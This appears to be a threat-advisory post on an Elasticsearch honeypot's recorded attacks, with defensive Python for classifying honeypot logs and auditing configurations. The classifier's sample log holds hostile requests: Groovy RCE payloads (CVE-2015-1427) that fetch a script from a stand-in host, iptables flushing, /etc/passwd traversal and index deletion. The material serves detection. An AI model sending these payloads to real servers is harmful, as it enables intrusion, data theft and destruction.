Elasticsearch: Honeypot method gets the attention of Threat actors

June 23, 2020
elasticsearch honeypot threat actors threat advisory

Elasticsearch is an open source search and analytics engine developed by Elastic. Instances left reachable without authentication have repeatedly led to leaked, lost, or stolen data because the data was not securely stored, and that track record is one of the reasons threat actors target the software. Attackers can locate unsecured Elasticsearch instances faster than search engines index them.


Security team tests the honeypot

A private security research team set up an Elasticsearch honeypot to measure how quickly unsecured data becomes compromised. A honeypot is a decoy system placed on the Internet by security researchers to attract and “trap” attackers who try to break into other people’s systems, so that their activity can be recorded.

The research team left the Elasticsearch server exposed from May 11, 2020 to May 20, 2020. Attacks began just 8 hours after deployment, and 175 attacks were recorded in total, an average of about 18 per day.


Honeypot Statistics

The highest numbers of attacks came from IP addresses geolocated to the U.S. (89), Romania (38), and China (15).

Most attacks aimed to learn the status of the database and its settings, which is what an attacker does first to confirm that the instance answers without authentication and to see what it holds. A total of 147 attacks used the GET request method.

“Attackers weren’t just interested in stealing data. Some wanted to hijack servers to mine cryptocurrency, steal passwords, and destroy data.” – Comparitech

Most of the threat actors were trying to mine cryptocurrency by exploiting an old vulnerability, CVE-2015-1427, a remote code execution flaw in the Groovy scripting engine of Elasticsearch releases before 1.3.8 and 1.4.3, to install a miner. These attacks came from different IP addresses but fetched their script from the same download source.


More attacks from the threat actors

Another attack went after the server’s /etc/passwd file, the list of local user accounts that attackers commonly read to confirm arbitrary file access, using path traversal in both GET and POST requests.

Other attacks attempted to change the server configuration so that all stored data could be deleted, with a ransom demand following the destruction. One threat actor also tried to turn off the host firewall by disabling iptables.

On May 29, 2020, a bot found the honeypot. It deleted the contents of the database and left a message demanding a ransom, together with contact information.
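To make the attack classes above concrete, here is an added example (written for this article, not code from the page or from Comparitech’s study) that runs simple detection heuristics over a constructed honeypot request log: GET requests to cluster-state endpoints as reconnaissance, a Groovy script reaching java.lang.Runtime inside a search body as the CVE-2015-1427 pattern, literal or percent-encoded ../ in the path as traversal towards /etc/passwd, iptables commands as firewall tampering, DELETE calls as data destruction, and ransom wording in a newly written document. It also groups payload URLs by client IP to surface the “same download source from different IPs” signal mentioned above. The log format, IP addresses, payload URL and keyword lists are all constructed for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed honeypot log excerpt (not data from the page or the Comparitech study).
# One request per line: "<source ip> <method> <path> <body or - when empty>".
SAMPLE_LOG = """\
203.0.113.10 GET / -
203.0.113.10 GET /_cluster/health -
203.0.113.10 GET /_cat/indices?v -
198.51.100.7 GET /_search?q=* -
198.51.100.7 POST /_search {"size":1,"script_fields":{"x":{"script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"wget http://198.51.100.99/x.sh\\")","lang":"groovy"}}}
192.0.2.44 POST /_search {"script_fields":{"x":{"script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"curl http://198.51.100.99/x.sh\\")","lang":"groovy"}}}
192.0.2.44 POST /_search {"script_fields":{"x":{"script":"java.lang.Runtime.getRuntime().exec(\\"iptables -F\\")","lang":"groovy"}}}
203.0.113.77 GET /../../../../etc/passwd -
203.0.113.77 POST /_plugin/head/..%2F..%2F..%2Fetc%2Fpasswd -
203.0.113.90 DELETE /_all -
203.0.113.90 PUT /read_me/_doc/1 {"message":"Your data is backed up. Send 0.1 BTC to recover. Contact: recover@example.invalid"}
"""

# Endpoints that only reveal cluster state and settings: the reconnaissance the page describes.
RECON_PREFIXES = ("/_cluster", "/_cat", "/_nodes", "/_settings", "/_stats")
GROOVY_SCRIPT = re.compile(r'"lang"\s*:\s*"groovy"')
JAVA_EXEC = re.compile(r"Runtime|ProcessBuilder")
RANSOM_WORDS = re.compile(r"\b(btc|bitcoin|ransom|recover|contact)\b")
URL = re.compile(r"https?://[^\s\"'\\]+")


def classify(method, path, body):
    """Tag one request with the attack classes it matches (a request can match several)."""
    tags = []
    decoded = unquote(path)          # catch %2F-encoded traversal as well as literal ../
    lowered = body.lower()
    if "../" in decoded or "/etc/passwd" in decoded or "/etc/passwd" in lowered:
        tags.append("path_traversal")
    # CVE-2015-1427 pattern: a Groovy script in a search request reaching java.lang.Runtime
    if GROOVY_SCRIPT.search(body) and JAVA_EXEC.search(body):
        tags.append("cve_2015_1427_rce")
    if re.search(r"\biptables\b", lowered):
        tags.append("firewall_tampering")
    if method == "DELETE":
        tags.append("data_destruction")
    if method in ("PUT", "POST") and RANSOM_WORDS.search(lowered):
        tags.append("ransom_note")
    if method == "GET" and "/_search" in decoded:
        tags.append("data_read")
    if method == "GET" and (decoded == "/" or decoded.startswith(RECON_PREFIXES)):
        tags.append("recon")
    return tags


def analyse(log_text):
    """Summarise a log: counts per tag and method, per-source breakdown, shared payload hosts."""
    tag_counts, method_counts = Counter(), Counter()
    per_ip = defaultdict(Counter)
    sources = defaultdict(set)       # download URL -> set of client IPs that referenced it
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ip, method, path, body = line.split(" ", 3)
        body = "" if body == "-" else body
        method_counts[method] += 1
        for tag in classify(method, path, body):
            tag_counts[tag] += 1
            per_ip[ip][tag] += 1
        for url in URL.findall(body):
            sources[url].add(ip)
    # The same payload URL seen from several IPs is the "same script download source" signal
    shared = {u: sorted(ips) for u, ips in sources.items() if len(ips) > 1}
    return {"tags": tag_counts, "methods": method_counts,
            "per_ip": dict(per_ip), "shared_download_sources": shared}


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for key in ("methods", "tags"):
        print(key, dict(report[key]))
    print("shared download sources", report["shared_download_sources"])
```

A classifier like this is deliberately coarse. On a real honeypot you would feed it the HTTP access log of the instance or of the proxy in front of it, keep the raw request bodies, and review each tag’s hits by hand before treating a count as a statistic.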



Given that billions of records belonging to millions of users have already leaked from unprotected Elasticsearch servers, take extra care: enable authentication, use strong credentials, and enable Transport Layer Security (TLS) so that data is protected while it transits the network. Do not expose the REST API port (9200 by default) directly to the Internet; bind it to an internal interface and restrict access with a firewall or reverse proxy.
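As an added example (not part of the original article), the following Python audit reads two constructed elasticsearch.yml files, one exposed the way the honeypot was and one hardened as recommended above, and reports the weak settings. The setting names are the real Elasticsearch 7.x keys (network.host, xpack.security.enabled, xpack.security.http.ssl.* and xpack.security.transport.ssl.*); the flat key/value parser, the two sample configs and the severity labels are this example’s own assumptions. It treats a missing xpack.security.enabled as disabled, which is correct for a 7.x basic-license node but would be a false positive on 8.x, where security is on by default.

```python
# Weak-vs-hardened elasticsearch.yml check. Both configs are constructed examples
# (not from the page); the setting names are the real Elasticsearch 7.x keys.
WEAK_CONFIG = """\
# a node exposed the way the honeypot was
cluster.name: logs
node.name: node-1
network.host: 0.0.0.0
http.port: 9200
discovery.type: single-node
xpack.security.enabled: false
"""

HARDENED_CONFIG = """\
cluster.name: logs
node.name: node-1
network.host: 10.0.0.5   # internal interface only; still firewall it
http.port: 9200
discovery.type: single-node
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/http.p12
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.keystore.path: certs/transport.p12
xpack.security.transport.ssl.truststore.path: certs/transport.p12
"""

WILDCARD_BINDS = {"0.0.0.0", "::", "_global_", "_site_"}
LOOPBACK = {"_local_", "127.0.0.1", "::1", "localhost"}


def parse_flat_yaml(text):
    """Parse the flat 'dotted.key: value' form elasticsearch.yml normally uses.
    Nested YAML blocks are not supported (an assumption of this example)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments; assumes no '#' inside values
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("\"'")
    return settings


def audit_elasticsearch_yml(text):
    """Return (severity, message) findings for the exposure patterns the article describes."""
    s = parse_flat_yaml(text)
    findings = []
    host = s.get("network.host", "_local_")      # Elasticsearch binds to loopback when unset
    if host in WILDCARD_BINDS:
        findings.append(("high", f"network.host={host} exposes the REST API on every interface"))
    elif host not in LOOPBACK:
        findings.append(("notice", f"network.host={host} is reachable from the network; restrict it with a firewall"))
    # On 7.x the security module must be switched on explicitly (8.x enables it by default)
    if s.get("xpack.security.enabled", "false") != "true":
        findings.append(("high", "xpack.security.enabled is not true: the REST API needs no credentials"))
    for layer in ("http", "transport"):
        enabled_key = f"xpack.security.{layer}.ssl.enabled"
        if s.get(enabled_key, "false") != "true":
            findings.append(("high", f"{enabled_key} is not true: {layer} traffic is sent in clear"))
        elif not (s.get(f"xpack.security.{layer}.ssl.keystore.path")
                  or s.get(f"xpack.security.{layer}.ssl.certificate")):
            # TLS switched on without a keystore or PEM certificate: the node will not start
            findings.append(("high", f"{enabled_key} is true but no keystore/certificate is configured"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name)
        for severity, message in audit_elasticsearch_yml(cfg):
            print(f"  [{severity}] {message}")
```

Run as a script it prints the findings for both configs. The hardened config yields only the notice about a non-loopback bind, which is expected when application hosts must reach the node; the remedy is a network ACL, not a config key.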
